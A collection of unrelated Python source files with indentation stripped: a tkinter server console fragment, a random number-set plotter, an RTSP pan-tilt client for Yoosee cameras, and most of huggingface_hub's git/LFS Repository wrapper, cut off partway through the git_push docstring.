self.handle_command('sv_quit', display = False)
self.process_interface.send(['quit'])
self.process_interface.close()
if type(self.toplevel) is tk.Tk:
self.toplevel.destroy()
def submit_command(self, event = None):
self.handle_command(self.cmd_var.get())
self.cmd_var.set('')
def handle_command(self, cmd, display = True):
if display:
self.output_listbox.insert(tk.END, '] {}'.format(cmd))
self.process_interface.send(['cmdout', cmd])
class styling:
class fonts:
typeface = 'Courier New'
small = (typeface, 10)
medium = (typeface, 15)
large = (typeface, 25)
relief = tk.FLAT
overrelief = tk.GROOVE
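# Hedged usage sketch (not part of the original module; the echo handler and
# pipe wiring below are illustrative). ServerCommandLineUI expects a callable
# that turns a command string into display text, plus a Pipe end from which it
# receives server output to push into the console widget.
if __name__ == '__main__':
    ui_end, server_end = mp.Pipe()
    ui = ServerCommandLineUI(lambda cmd: 'echo: {}'.format(cmd), ui_end)
    server_end.send('server console ready')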
|
pick_three.py
|
"""
This simple program generates random 3-value sets,
and assumes that the order of the values in the set
are not important.
2 graphs are displayed:
The first graph shows a plotting of all possible
sets that could exist.
The second graph shows the output of function
randomly_sample.
The graphs simply serve as a method to check
that the functions' outputs are random, as a
distribution of numbers chosen randomly should
be uniform in shape.
This is not a frequency distribution, which would
in theory be more practical; however, a standard
plotting of the chosen sets will demonstrate the
concept just fine.
This program also outputs to stdout 1 set chosen
at random from the universe of all possible sets
that could exist.
The sets all have a shared property: they are
comprised of int values 0 - 9.
"""
import multiprocessing
from itertools import combinations_with_replacement
from random import choices
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
SAMPLE = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
universe = []
setSize = 3
picks = []
random_universe = []
def generate_universe(set_size, sampleList):
return list(combinations_with_replacement(sampleList, set_size))
def randomly_sample(universe, num_of_samples):
return choices(universe, k=num_of_samples)
def generate_graph(universe, grph_title, fig_num):
fig = plt.figure(fig_num)
fig.suptitle(grph_title)
ax = fig.add_subplot(111, projection='3d')
ax.set_xlabel('pick 1')
ax.set_ylabel('pick 2')
ax.set_zlabel('pick 3')
for tupleSet in universe:
x = tupleSet[0]
y = tupleSet[1]
z = tupleSet[2]
ax.scatter(x, y, z,)
plt.show()
def main():
universe = generate_universe(setSize, SAMPLE)
picks = randomly_sample(universe, 1)
random_universe = randomly_sample(universe, 10000)
p0 = multiprocessing.Process(target=generate_graph, args=(universe, "All possible sets", 1))
p1 = multiprocessing.Process(target=generate_graph, args=(random_universe, "Randomly chosen sets", 2))
p0.start()
p1.start()
print(picks)
if __name__ == '__main__':
main()
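# Sanity check (hedged addition, not part of the original script): with 10
# symbols and sets of size 3, combinations_with_replacement yields
# C(10 + 3 - 1, 3) = C(12, 3) = 220 possible sets.
def _universe_size_check() -> int:
    from math import comb  # Python 3.8+
    universe_size = len(generate_universe(setSize, SAMPLE))
    assert universe_size == comb(len(SAMPLE) + setSize - 1, setSize) == 220
    return universe_size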
|
yoosee.py
|
import socket
import time
from threading import Thread
class Yoosee():
def __init__(self, host):
self.host = host
self.port = 554
self.connected = False
self.ticks = None
self.client = None
def ptz(self, cmd):
cmd = cmd.upper()
if ['UP', 'DOWN', 'LEFT', 'RIGHT'].count(cmd) != 1:
return
# Swap UP/DOWN so the command matches the on-screen direction
if cmd == 'UP':
cmd = 'DOWN'
elif cmd == 'DOWN':
cmd = 'UP'
# The protocol expects 'DWON' (sic), so convert it; reason unknown
if cmd == 'DOWN':
cmd = 'DWON'
# Reset the busy flag if the last command started more than a few seconds ago
if self.ticks is not None and int(time.time()) - self.ticks > 3 and self.connected:
self.connected = False
t = Thread(target=self.move, args=(cmd,))
t.start()
# Send data
def send(self, data):
try:
if self.client is not None:
self.client.send(data.encode())
except Exception as ex:
print(ex)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(30)
client.connect((self.host, self.port))
self.client = client
# Initial RTSP handshake data
init_data = "SETUP rtsp://" + self.host + "/onvif1/track1 RTSP/1.0\r\n" + \
"CSeq: 1\r\n" + \
"User-Agent: LibVLC/2.2.6 (LIVE555 Streaming Media v2016.02.22)\r\n" + \
"Transport: RTP/AVP/TCP;unicast;interleaved=0-1\r\n\r\n"
client.send(init_data.encode())
time.sleep(2)
client.send(data.encode())
def move(self, ptzCmd):
if self.connected:
print('Operation already in progress')
return
self.connected = True
print('Connected', self.host, ptzCmd)
self.ticks = int(time.time())
# Send the PTZ command
self.send("SET_PARAMETER rtsp://" + self.host + "/onvif1 RTSP/1.0\r\n" + \
"Content-type: ptzCmd: " + ptzCmd + "\r\n" + \
"CSeq: 2\r\n" + \
"Session: 12345678\r\n\r\n")
# client.close()
print("我已经退出了,后会无期")
self.connected = False
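# Hedged usage sketch (the host address below is illustrative): pan the camera
# left once; the class opens its own RTSP socket on port 554 in a worker thread.
if __name__ == '__main__':
    cam = Yoosee('192.168.1.50')
    cam.ptz('LEFT')
    time.sleep(5)  # give the worker thread time to finish before the script exits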
|
repository.py
|
import atexit
import os
import re
import subprocess
import tempfile
import threading
import time
from contextlib import contextmanager
from pathlib import Path
from typing import Callable, Dict, Iterator, List, Optional, Tuple, Union
from urllib.parse import urlparse
from tqdm.auto import tqdm
from huggingface_hub.constants import REPO_TYPES_URL_PREFIXES, REPOCARD_NAME
from huggingface_hub.repocard import metadata_load, metadata_save
from requests.exceptions import HTTPError
from .hf_api import HfApi, HfFolder, repo_type_and_id_from_hf_id
from .lfs import LFS_MULTIPART_UPLOAD_COMMAND
from .utils import logging, run_subprocess
logger = logging.get_logger(__name__)
class CommandInProgress:
"""
Utility to follow commands launched asynchronously.
"""
def __init__(
self,
title: str,
is_done_method: Callable,
status_method: Callable,
process: subprocess.Popen,
post_method: Optional[Callable] = None,
):
self.title = title
self._is_done = is_done_method
self._status = status_method
self._process = process
self._stderr = ""
self._stdout = ""
self._post_method = post_method
@property
def is_done(self) -> bool:
"""
Whether the process is done.
"""
result = self._is_done()
if result and self._post_method is not None:
self._post_method()
self._post_method = None
return result
@property
def status(self) -> int:
"""
The exit code/status of the current action. Will return `0` if the
command has completed successfully, and a number between 1 and 255 if
the process errored-out.
Will return -1 if the command is still ongoing.
"""
return self._status()
@property
def failed(self) -> bool:
"""
Whether the process errored-out.
"""
return self.status > 0
@property
def stderr(self) -> str:
"""
The current output message on the standard error.
"""
self._stderr += self._process.stderr.read()
return self._stderr
@property
def stdout(self) -> str:
"""
The current output message on the standard output.
"""
self._stdout += self._process.stdout.read()
return self._stdout
def __repr__(self):
status = self.status
if status == -1:
status = "running"
return (
f"[{self.title} command, status code: {status},"
f" {'in progress.' if not self.is_done else 'finished.'} PID:"
f" {self._process.pid}]"
)
def is_git_repo(folder: Union[str, Path]) -> bool:
"""
Check if the folder is the root or part of a git repository
Args:
folder (`str`):
The folder in which to run the command.
Returns:
`bool`: `True` if the folder is the root or part of a git repository, `False`
otherwise.
"""
folder_exists = os.path.exists(os.path.join(folder, ".git"))
git_branch = subprocess.run(
"git branch".split(), cwd=folder, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
return folder_exists and git_branch.returncode == 0
def is_local_clone(folder: Union[str, Path], remote_url: str) -> bool:
"""
Check if the folder is a local clone of the remote_url
Args:
folder (`str` or `Path`):
The folder in which to run the command.
remote_url (`str`):
The url of a git repository.
Returns:
`bool`: `True` if the repository is a local clone of the remote
repository specified, `False` otherwise.
"""
if not is_git_repo(folder):
return False
remotes = run_subprocess("git remote -v".split(), folder).stdout
# Remove token for the test with remotes.
remote_url = re.sub(r"https://.*@", "https://", remote_url)
remotes = [re.sub(r"https://.*@", "https://", remote) for remote in remotes.split()]
return remote_url in remotes
def is_tracked_with_lfs(filename: Union[str, Path]) -> bool:
"""
Check if the file passed is tracked with git-lfs.
Args:
filename (`str` or `Path`):
The filename to check.
Returns:
`bool`: `True` if the file passed is tracked with git-lfs, `False`
otherwise.
"""
folder = Path(filename).parent
filename = Path(filename).name
try:
p = run_subprocess("git check-attr -a".split() + [filename], folder)
attributes = p.stdout.strip()
except subprocess.CalledProcessError as exc:
if not is_git_repo(folder):
return False
else:
raise OSError(exc.stderr)
if len(attributes) == 0:
return False
found_lfs_tag = {"diff": False, "merge": False, "filter": False}
for attribute in attributes.split("\n"):
for tag in found_lfs_tag.keys():
if tag in attribute and "lfs" in attribute:
found_lfs_tag[tag] = True
return all(found_lfs_tag.values())
def is_git_ignored(filename: Union[str, Path]) -> bool:
"""
Check if file is git-ignored. Supports nested .gitignore files.
Args:
filename (`str` or `Path`):
The filename to check.
Returns:
`bool`: `True` if the file passed is ignored by `git`, `False`
otherwise.
"""
folder = Path(filename).parent
filename = Path(filename).name
try:
p = run_subprocess("git check-ignore".split() + [filename], folder, check=False)
# Will return exit code 1 if not gitignored
is_ignored = not bool(p.returncode)
except subprocess.CalledProcessError as exc:
raise OSError(exc.stderr)
return is_ignored
def is_binary_file(filename: Union[str, Path]) -> bool:
"""
Check if file is a binary file.
Args:
filename (`str` or `Path`):
The filename to check.
Returns:
`bool`: `True` if the file passed is a binary file, `False` otherwise.
"""
try:
with open(filename, "rb") as f:
content = f.read(10 * (1024**2)) # Read a maximum of 10MB
# Code sample taken from the following stack overflow thread
# https://stackoverflow.com/questions/898669/how-can-i-detect-if-a-file-is-binary-non-text-in-python/7392391#7392391
text_chars = bytearray(
{7, 8, 9, 10, 12, 13, 27} | set(range(0x20, 0x100)) - {0x7F}
)
return bool(content.translate(None, text_chars))
except UnicodeDecodeError:
return True
def files_to_be_staged(pattern: str, folder: Union[str, Path]) -> List[str]:
"""
Returns a list of filenames that are to be staged.
Args:
pattern (`str` or `Path`):
The pattern of filenames to check. Put `.` to get all files.
folder (`str` or `Path`):
The folder in which to run the command.
Returns:
`List[str]`: List of files that are to be staged.
"""
try:
p = run_subprocess("git ls-files -mo".split() + [pattern], folder)
if len(p.stdout.strip()):
files = p.stdout.strip().split("\n")
else:
files = []
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
return files
def is_tracked_upstream(folder: Union[str, Path]) -> bool:
"""
Check if the current checked-out branch is tracked upstream.
Args:
folder (`str` or `Path`):
The folder in which to run the command.
Returns:
`bool`: `True` if the current checked-out branch is tracked upstream,
`False` otherwise.
"""
try:
run_subprocess(
"git rev-parse --symbolic-full-name --abbrev-ref @{u}".split(), folder
)
return True
except subprocess.CalledProcessError as exc:
if "HEAD" in exc.stderr:
raise OSError("No branch checked out")
return False
def commits_to_push(folder: Union[str, Path], upstream: Optional[str] = None) -> int:
"""
Check the number of commits that would be pushed upstream
Args:
folder (`str` or `Path`):
The folder in which to run the command.
upstream (`str`, *optional*):
The name of the upstream repository with which the comparison should be
made.
Returns:
`int`: Number of commits that would be pushed upstream were a `git
push` to proceed.
"""
try:
result = run_subprocess(f"git cherry -v {upstream or ''}".split(), folder)
return len(result.stdout.split("\n")) - 1
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
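# Hedged helper sketch (not part of huggingface_hub): combine the module-level
# predicates above to decide whether a folder is ready to be pushed as-is.
def _can_push(folder: Union[str, Path], remote_url: str) -> bool:
    return (
        is_git_repo(folder)
        and is_local_clone(folder, remote_url)
        and is_tracked_upstream(folder)
        and commits_to_push(folder) > 0
    )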
@contextmanager
def _lfs_log_progress():
"""
This is a context manager that will log the Git LFS progress of cleaning,
smudging, pulling and pushing.
"""
if logger.getEffectiveLevel() >= logging.ERROR:
try:
yield
finally:
return
def output_progress(stopping_event: threading.Event):
"""
To be launched as a separate thread with an event meaning it should stop
the tail.
"""
pbars = {}
def close_pbars():
for pbar in pbars.values():
pbar["bar"].update(pbar["bar"].total - pbar["past_bytes"])
pbar["bar"].refresh()
pbar["bar"].close()
def tail_file(filename) -> Iterator[str]:
"""
Creates a generator to be iterated through, which will return each
line one by one. Will stop tailing the file if the stopping_event is
set.
"""
with open(filename, "r") as file:
current_line = ""
while True:
if stopping_event.is_set():
close_pbars()
break
line_bit = file.readline()
if line_bit is not None and not len(line_bit.strip()) == 0:
current_line += line_bit
if current_line.endswith("\n"):
yield current_line
current_line = ""
else:
time.sleep(1)
# If the file isn't created yet, wait for a few seconds before trying again.
# Can be interrupted with the stopping_event.
while not os.path.exists(os.environ["GIT_LFS_PROGRESS"]):
if stopping_event.is_set():
close_pbars()
return
time.sleep(2)
for line in tail_file(os.environ["GIT_LFS_PROGRESS"]):
state, file_progress, byte_progress, filename = line.split()
description = f"{state.capitalize()} file {filename}"
current_bytes, total_bytes = byte_progress.split("/")
current_bytes = int(current_bytes)
total_bytes = int(total_bytes)
if pbars.get((state, filename)) is None:
pbars[(state, filename)] = {
"bar": tqdm(
desc=description,
initial=current_bytes,
total=total_bytes,
unit="B",
unit_scale=True,
unit_divisor=1024,
),
"past_bytes": current_bytes,
}
else:
past_bytes = pbars[(state, filename)]["past_bytes"]
pbars[(state, filename)]["bar"].update(current_bytes - past_bytes)
pbars[(state, filename)]["past_bytes"] = current_bytes
current_lfs_progress_value = os.environ.get("GIT_LFS_PROGRESS", "")
with tempfile.TemporaryDirectory() as tmpdir:
os.environ["GIT_LFS_PROGRESS"] = os.path.join(tmpdir, "lfs_progress")
logger.debug(f"Following progress in {os.environ['GIT_LFS_PROGRESS']}")
exit_event = threading.Event()
x = threading.Thread(target=output_progress, args=(exit_event,), daemon=True)
x.start()
try:
yield
finally:
exit_event.set()
x.join()
os.environ["GIT_LFS_PROGRESS"] = current_lfs_progress_value
class Repository:
"""
Helper class to wrap the git and git-lfs commands.
The aim is to facilitate interacting with huggingface.co hosted model or
dataset repos, though not a lot here (if any) is actually specific to
huggingface.co.
"""
command_queue: List[CommandInProgress]
def __init__(
self,
local_dir: str,
clone_from: Optional[str] = None,
repo_type: Optional[str] = None,
use_auth_token: Union[bool, str] = True,
git_user: Optional[str] = None,
git_email: Optional[str] = None,
revision: Optional[str] = None,
private: bool = False,
skip_lfs_files: bool = False,
client: Optional[HfApi] = None,
):
"""
Instantiate a local clone of a git repo.
If specifying a `clone_from`, it will clone an existing remote
repository, for instance one that was previously created using
`HfApi().create_repo(repo_id=repo_name)`.
`Repository` uses the local git credentials by default, but if required,
the `huggingface_token` as well as the git `user` and the `email` can be
explicitly specified.
Args:
local_dir (`str`):
path (e.g. `'my_trained_model/'`) to the local directory, where
the `Repository` will be initialized.
clone_from (`str`, *optional*):
repository url (e.g.
`'https://huggingface.co/philschmid/playground-tests'`).
repo_type (`str`, *optional*):
To set when creating a repo: set to "dataset" or "space" if
creating a dataset or space; the default is a model.
use_auth_token (`str` or `bool`, *optional*, defaults to `True`):
huggingface_token can be extracted from `HfApi().login(username,
password)` and is used to authenticate against the hub (useful
from Google Colab for instance).
git_user (`str`, *optional*):
will override the `git config user.name` for committing and
pushing files to the hub.
git_email (`str`, *optional*):
will override the `git config user.email` for committing and
pushing files to the hub.
revision (`str`, *optional*):
Revision to checkout after initializing the repository. If the
revision doesn't exist, a branch will be created with that
revision name from the default branch's current HEAD.
private (`bool`, *optional*, defaults to `False`):
whether the repository is private or not.
skip_lfs_files (`bool`, *optional*, defaults to `False`):
whether to skip git-LFS files or not.
client (`HfApi`, *optional*):
Instance of HfApi to use when calling the HF Hub API. A new
instance will be created if this is left to `None`.
"""
os.makedirs(local_dir, exist_ok=True)
self.local_dir = os.path.join(os.getcwd(), local_dir)
self.repo_type = repo_type
self.command_queue = []
self.private = private
self.skip_lfs_files = skip_lfs_files
self.client = client if client is not None else HfApi()
self.check_git_versions()
if isinstance(use_auth_token, str):
self.huggingface_token = use_auth_token
elif use_auth_token:
self.huggingface_token = HfFolder.get_token()
else:
self.huggingface_token = None
if clone_from is not None:
self.clone_from(repo_url=clone_from)
else:
if is_git_repo(self.local_dir):
logger.debug("[Repository] is a valid git repo")
else:
raise ValueError(
"If not specifying `clone_from`, you need to pass Repository a"
" valid git clone."
)
if self.huggingface_token is not None and (
git_email is None or git_user is None
):
user = self.client.whoami(self.huggingface_token)
if git_email is None:
git_email = user["email"]
if git_user is None:
git_user = user["fullname"]
if git_user is not None or git_email is not None:
self.git_config_username_and_email(git_user, git_email)
self.lfs_enable_largefiles()
self.git_credential_helper_store()
if revision is not None:
self.git_checkout(revision, create_branch_ok=True)
# This ensures that all commands exit before exiting the Python runtime.
# This will ensure all pushes register on the hub, even if other errors happen in subsequent operations.
atexit.register(self.wait_for_commands)
@property
def current_branch(self) -> str:
"""
Returns the current checked out branch.
Returns:
`str`: Current checked out branch.
"""
try:
result = run_subprocess(
"git rev-parse --abbrev-ref HEAD".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
return result
def check_git_versions(self):
"""
Checks that `git` and `git-lfs` can be run.
Raises:
`EnvironmentError`: if `git` or `git-lfs` are not installed.
"""
try:
git_version = run_subprocess(
"git --version".split(), self.local_dir
).stdout.strip()
except FileNotFoundError:
raise EnvironmentError(
"Looks like you do not have git installed, please install."
)
try:
lfs_version = run_subprocess(
"git-lfs --version".split(), self.local_dir
).stdout.strip()
except FileNotFoundError:
raise EnvironmentError(
"Looks like you do not have git-lfs installed, please install."
" You can install from https://git-lfs.github.com/."
" Then run `git lfs install` (you only have to do this once)."
)
logger.info(git_version + "\n" + lfs_version)
def clone_from(self, repo_url: str, use_auth_token: Union[bool, str, None] = None):
"""
Clone from a remote. If the folder already exists, will try to clone the
repository within it.
If this folder is a git repository with linked history, will try to
update the repository.
Args:
repo_url (`str`):
The URL from which to clone the repository
use_auth_token (`Union[str, bool]`, *optional*):
Whether to use the authentication token. It can be:
- a string which is the token itself
- `False`, which would not use the authentication token
- `True`, which would fetch the authentication token from the
local folder and use it (you should be logged in for this to
work).
- `None`, which would retrieve the value of
`self.huggingface_token`.
Raises:
`ValueError`: if the `token` cannot be identified and the `private`
keyword is set to `True`. The `token`
must be passed in order to handle private repositories.
Raises:
`EnvironmentError`: if you are trying to clone the repository in a
non-empty folder, or if the `git`
operations raise errors.
"""
token = use_auth_token if use_auth_token is not None else self.huggingface_token
if token is None and self.private:
raise ValueError(
"Couldn't load Hugging Face Authorization Token. Credentials are"
" required to work with private repositories. Please login in using"
" `huggingface-cli login` or provide your token manually with the"
" `use_auth_token` key."
)
hub_url = self.client.endpoint
if hub_url in repo_url or (
"http" not in repo_url and len(repo_url.split("/")) <= 2
):
repo_type, namespace, repo_id = repo_type_and_id_from_hf_id(
repo_url, hub_url=hub_url
)
if repo_type is not None:
self.repo_type = repo_type
repo_url = hub_url + "/"
if self.repo_type in REPO_TYPES_URL_PREFIXES:
repo_url += REPO_TYPES_URL_PREFIXES[self.repo_type]
if token is not None:
whoami_info = self.client.whoami(token)
user = whoami_info["name"]
valid_organisations = [org["name"] for org in whoami_info["orgs"]]
if namespace is not None:
repo_id = f"{namespace}/{repo_id}"
repo_url += repo_id
scheme = urlparse(repo_url).scheme
repo_url = repo_url.replace(f"{scheme}://", f"{scheme}://user:{token}@")
if namespace == user or namespace in valid_organisations:
try:
_ = HfApi().repo_info(
f"{repo_id}", repo_type=self.repo_type, token=token
)
except HTTPError:
if self.repo_type == "space":
raise ValueError(
"Creating a Space through passing Space link to"
" clone_from is not allowed. Make sure the Space exists"
" on Hugging Face Hub."
)
else:
self.client.create_repo(
repo_id=repo_id,
token=token,
repo_type=self.repo_type,
exist_ok=True,
private=self.private,
)
else:
if namespace is not None:
repo_url += f"{namespace}/"
repo_url += repo_id
# For error messages, it's cleaner to show the repo url without the token.
clean_repo_url = re.sub(r"(https?)://.*@", r"\1://", repo_url)
try:
run_subprocess("git lfs install".split(), self.local_dir)
# checks if the repository is initialized in an empty folder or in one with existing files
if len(os.listdir(self.local_dir)) == 0:
logger.warning(f"Cloning {clean_repo_url} into local empty directory.")
with _lfs_log_progress():
env = os.environ.copy()
if self.skip_lfs_files:
env.update({"GIT_LFS_SKIP_SMUDGE": "1"})
run_subprocess(
f"{'git clone' if self.skip_lfs_files else 'git lfs clone'} {repo_url} ."
.split(),
self.local_dir,
env=env,
)
else:
# Check if the folder is the root of a git repository
in_repository = is_git_repo(self.local_dir)
if in_repository:
if is_local_clone(self.local_dir, repo_url):
logger.warning(
f"{self.local_dir} is already a clone of {clean_repo_url}."
" Make sure you pull the latest changes with"
" `repo.git_pull()`."
)
else:
output = run_subprocess(
"git remote get-url origin".split(),
self.local_dir,
check=False,
)
error_msg = (
f"Tried to clone {clean_repo_url} in an unrelated git"
" repository.\nIf you believe this is an error, please add"
f" a remote with the following URL: {clean_repo_url}."
)
if output.returncode == 0:
clean_local_remote_url = re.sub(
r"https://.*@", "https://", output.stdout
)
error_msg += (
"\nLocal path has its origin defined as:"
f" {clean_local_remote_url}"
)
raise EnvironmentError(error_msg)
if not in_repository:
raise EnvironmentError(
"Tried to clone a repository in a non-empty folder that isn't a"
" git repository. If you really want to do this, do it"
" manually:\ngit init && git remote add origin && git pull"
" origin main\n or clone repo to a new folder and move your"
" existing files there afterwards."
)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_config_username_and_email(
self, git_user: Optional[str] = None, git_email: Optional[str] = None
):
"""
Sets git username and email (only in the current repo).
Args:
git_user (`str`, *optional*):
The username to register through `git`.
git_email (`str`, *optional*):
The email to register through `git`.
"""
try:
if git_user is not None:
run_subprocess(
"git config user.name".split() + [git_user], self.local_dir
)
if git_email is not None:
run_subprocess(
f"git config user.email {git_email}".split(), self.local_dir
)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_credential_helper_store(self):
"""
Sets the git credential helper to `store`
"""
try:
run_subprocess("git config credential.helper store".split(), self.local_dir)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_head_hash(self) -> str:
"""
Get commit sha on top of HEAD.
Returns:
`str`: The current checked out commit SHA.
"""
try:
p = run_subprocess("git rev-parse HEAD".split(), self.local_dir)
return p.stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_remote_url(self) -> str:
"""
Get URL to origin remote.
Returns:
`str`: The URL of the `origin` remote.
"""
try:
p = run_subprocess(
"git config --get remote.origin.url".split(), self.local_dir
)
url = p.stdout.strip()
# Strip basic auth info.
return re.sub(r"https://.*@", "https://", url)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_head_commit_url(self) -> str:
"""
Get URL to last commit on HEAD. We assume it's been pushed, and the url
scheme is the same one as for GitHub or HuggingFace.
Returns:
`str`: The URL to the current checked-out commit.
"""
sha = self.git_head_hash()
url = self.git_remote_url()
if url.endswith("/"):
url = url[:-1]
return f"{url}/commit/{sha}"
def list_deleted_files(self) -> List[str]:
"""
Returns a list of the files that are deleted in the working directory or
index.
Returns:
`List[str]`: A list of files that have been deleted in the working
directory or index.
"""
try:
git_status = run_subprocess(
"git status -s".split(), self.local_dir
).stdout.strip()
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
if len(git_status) == 0:
return []
# Receives a status like the following
# D .gitignore
# D new_file.json
# AD new_file1.json
# ?? new_file2.json
# ?? new_file4.json
# Strip each line of whitespaces
modified_files_statuses = [status.strip() for status in git_status.split("\n")]
# Only keep files that are deleted using the D prefix
deleted_files_statuses = [
status for status in modified_files_statuses if "D" in status.split()[0]
]
# Remove the D prefix and strip to keep only the relevant filename
deleted_files = [
status.split()[-1].strip() for status in deleted_files_statuses
]
return deleted_files
def lfs_track(
self, patterns: Union[str, List[str]], filename: Optional[bool] = False
):
"""
Tell git-lfs to track files according to a pattern.
Setting the `filename` argument to `True` will treat the arguments as
literal filenames, not as patterns. Any special glob characters in the
filename will be escaped when writing to the `.gitattributes` file.
Args:
patterns (`Union[str, List[str]]`):
The pattern, or list of patterns, to track with git-lfs.
filename (`bool`, *optional*, defaults to `False`):
Whether to use the patterns as literal filenames.
"""
if isinstance(patterns, str):
patterns = [patterns]
try:
for pattern in patterns:
cmd = f"git lfs track {'--filename' if filename else ''}".split()
cmd.append(pattern)
run_subprocess(cmd, self.local_dir)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def lfs_untrack(self, patterns: Union[str, List[str]]):
"""
Tell git-lfs to untrack those files.
Args:
patterns (`Union[str, List[str]]`):
The pattern, or list of patterns, to untrack with git-lfs.
"""
if isinstance(patterns, str):
patterns = [patterns]
try:
for pattern in patterns:
run_subprocess("git lfs untrack".split() + [pattern], self.local_dir)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def lfs_enable_largefiles(self):
"""
HF-specific. This enables upload support of files >5GB.
"""
try:
lfs_config = "git config lfs.customtransfer.multipart"
run_subprocess(f"{lfs_config}.path huggingface-cli".split(), self.local_dir)
run_subprocess(
f"{lfs_config}.args {LFS_MULTIPART_UPLOAD_COMMAND}".split(),
self.local_dir,
)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def auto_track_binary_files(self, pattern: Optional[str] = ".") -> List[str]:
"""
Automatically track binary files with git-lfs.
Args:
pattern (`str`, *optional*, defaults to "."):
The pattern with which to track files that are binary.
Returns:
`List[str]`: List of filenames that are now tracked due to being
binary files
"""
files_to_be_tracked_with_lfs = []
deleted_files = self.list_deleted_files()
for filename in files_to_be_staged(pattern, folder=self.local_dir):
if filename in deleted_files:
continue
path_to_file = os.path.join(os.getcwd(), self.local_dir, filename)
if not (is_tracked_with_lfs(path_to_file) or is_git_ignored(path_to_file)):
size_in_mb = os.path.getsize(path_to_file) / (1024 * 1024)
if size_in_mb >= 10:
logger.warning(
"Parsing a large file to check if binary or not. Tracking large"
" files using `repository.auto_track_large_files` is"
" recommended so as to not load the full file in memory."
)
is_binary = is_binary_file(path_to_file)
if is_binary:
self.lfs_track(filename)
files_to_be_tracked_with_lfs.append(filename)
# Cleanup the .gitattributes if files were deleted
self.lfs_untrack(deleted_files)
return files_to_be_tracked_with_lfs
def auto_track_large_files(self, pattern: Optional[str] = ".") -> List[str]:
"""
Automatically track large files (files that weigh more than 10MBs) with
git-lfs.
Args:
pattern (`str`, *optional*, defaults to "."):
The pattern with which to track files that are above 10MBs.
Returns:
`List[str]`: List of filenames that are now tracked due to their
size.
"""
files_to_be_tracked_with_lfs = []
deleted_files = self.list_deleted_files()
for filename in files_to_be_staged(pattern, folder=self.local_dir):
if filename in deleted_files:
continue
path_to_file = os.path.join(os.getcwd(), self.local_dir, filename)
size_in_mb = os.path.getsize(path_to_file) / (1024 * 1024)
if (
size_in_mb >= 10
and not is_tracked_with_lfs(path_to_file)
and not is_git_ignored(path_to_file)
):
self.lfs_track(filename)
files_to_be_tracked_with_lfs.append(filename)
# Cleanup the .gitattributes if files were deleted
self.lfs_untrack(deleted_files)
return files_to_be_tracked_with_lfs
def lfs_prune(self, recent=False):
"""
git lfs prune
Args:
recent (`bool`, *optional*, defaults to `False`):
Whether to prune files even if they were referenced by recent
commits. See the following
[link](https://github.com/git-lfs/git-lfs/blob/f3d43f0428a84fc4f1e5405b76b5a73ec2437e65/docs/man/git-lfs-prune.1.ronn#recent-files)
for more information.
"""
args = "git lfs prune".split()
if recent:
args.append("--recent")
try:
with _lfs_log_progress():
result = run_subprocess(
args,
self.local_dir,
)
logger.info(result.stdout)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_pull(self, rebase: Optional[bool] = False, lfs: Optional[bool] = False):
"""
git pull
Args:
rebase (`bool`, *optional*, defaults to `False`):
Whether to rebase the current branch on top of the upstream
branch after fetching.
lfs (`bool`, *optional*, defaults to `False`):
Whether to fetch the LFS files too. This option only changes the
behavior when a repository was cloned without fetching the LFS
files; calling `repo.git_pull(lfs=True)` will then fetch the LFS
file from the remote repository.
"""
command = ("git pull" if not lfs else "git lfs pull").split()
if rebase:
command.append("--rebase")
try:
with _lfs_log_progress():
result = run_subprocess(
command,
self.local_dir,
)
logger.info(result.stdout)
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_add(
self, pattern: Optional[str] = ".", auto_lfs_track: Optional[bool] = False
):
"""
git add
Setting the `auto_lfs_track` parameter to `True` will automatically
track files that are larger than 10MB with `git-lfs`.
Args:
pattern (`str`, *optional*, defaults to "."):
The pattern with which to add files to staging.
auto_lfs_track (`bool`, *optional*, defaults to `False`):
Whether to automatically track large and binary files with
git-lfs. Any file over 10MB in size, or in binary format, will
be automatically tracked.
"""
if auto_lfs_track:
# Track files according to their size (>=10MB)
tracked_files = self.auto_track_large_files(pattern)
# Read the remaining files and track them if they're binary
tracked_files.extend(self.auto_track_binary_files(pattern))
if tracked_files:
logger.warning(
f"Adding files tracked by Git LFS: {tracked_files}. This may take a"
" bit of time if the files are large."
)
try:
result = run_subprocess("git add -v".split() + [pattern], self.local_dir)
logger.info(f"Adding to index:\n{result.stdout}\n")
except subprocess.CalledProcessError as exc:
raise EnvironmentError(exc.stderr)
def git_commit(self, commit_message: str = "commit files to HF hub"):
"""
git commit
Args:
commit_message (`str`, *optional*, defaults to "commit files to HF hub"):
The message attributed to the commit.
"""
try:
result = run_subprocess(
"git commit -v -m".split() + [commit_message], self.local_dir
)
logger.info(f"Committed:\n{result.stdout}\n")
except subprocess.CalledProcessError as exc:
if len(exc.stderr) > 0:
raise EnvironmentError(exc.stderr)
else:
raise EnvironmentError(exc.stdout)
def git_push(
self,
upstream: Optional[str] = None,
blocking: Optional[bool] = True,
auto_lfs_prune: Optional[bool] = False,
) -> Union[str, Tuple[str, CommandInProgress]]:
"""
git push
If called with `blocking=True` (the default), returns the url of the
commit on the remote repo. If called with `blocking=False`, returns a
tuple containing that url and the `CommandInProgress` object to follow
for information about the asynchronous push.
Args:
upstream (`str`, *optional*):
Upstream to which this should push. If not specified, will push
to the lastly defined upstream or to the default one (`origin
main`).
blocking (`bool`, *optional*, defaults to `True`):
Whether the function should return only when the push has
finished. Setting this to `False` will return a
`CommandInProgress` object which has an `is_done` property. This
